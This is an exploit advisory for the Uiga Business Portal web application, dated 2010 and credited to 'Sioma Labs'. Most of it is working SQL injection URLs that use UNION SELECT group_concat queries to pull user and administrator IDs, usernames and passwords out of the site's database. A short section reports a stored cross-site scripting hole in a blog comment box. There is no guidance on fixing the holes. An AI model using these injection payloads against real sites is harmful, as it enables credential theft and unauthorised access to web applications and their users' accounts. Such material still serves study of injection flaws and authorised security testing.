# Exploit Title: Uiga Business Portal SQL/ XSS Vulnerability # Date: 8/2/2010 # Author: Sioma Labs # Site : http://www.scriptdevelopers.net # Software Link: http://www.scriptdevelopers.net/download/uigapersonalportal.zip # Version: N/A # Tested on: Linux OS = Cent OS 5.4 Server = Apache/2.2.3 SQLDB = MYSQL v5.0.77 Windows OS = Windows XPsp2 App = Wamp # CVE : N/A # Code : N/A ---------------------------------------------------- __ _ __ _ / _(_) ___ _ __ ___ __ _ / / __ _| |__ ___ \ \| |/ _ \| '_ ` _ \ / _` | / / / _` | '_ \/ __| _\ \ | (_) | | | | | | (_| | / /___ (_| | |_) \__ \ \__/_|\___/|_| |_| |_|\__,_| \____/\__,_|_.__/|___/ ---------------------------------------------------- SQL Injection Vulnerability UserAge : [host]/blog/index.php?view=noentryid&noentryid=[SQLi] - User SQLi -> -------------- Ex : http://linuxbox/ulgabusinessportak/blog/index.php?view=noentryid&noentryid=-20+Union+All+Select+1,2,3,4,5,group_concat(user_id,0x3a,username,0x3a,password),7,8,9,10+from+tbl_user-- - Admin SQLi -> --------------- Ex : http://linuxbox/ulgabusinessportak/index2.php?c=29&p=-45+Union+All+Select 1,group_concat(admin_id,0x3a,admin_name,0x3a,admin_password),3,4,5+from+admin-- - Or Choice By User ID -> -------------------------- http://linuxbox/ulgabusinessportak/blog/index.php?view=noentryid&noentryid=-20+Union+All+select+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10+from+tbl_user+where+user_id=1-- */ Change the last User ID ####################################################################################################### XSS Vulnerability -------- - You can inject html with the comment box Test Link http://linuxbox/ulgabusinessportak/blog/index.php?view=noentryid&noentryid=20 Inject "" into the portal using Comment Box # Sioma Agent -154 # http://siomalabs.com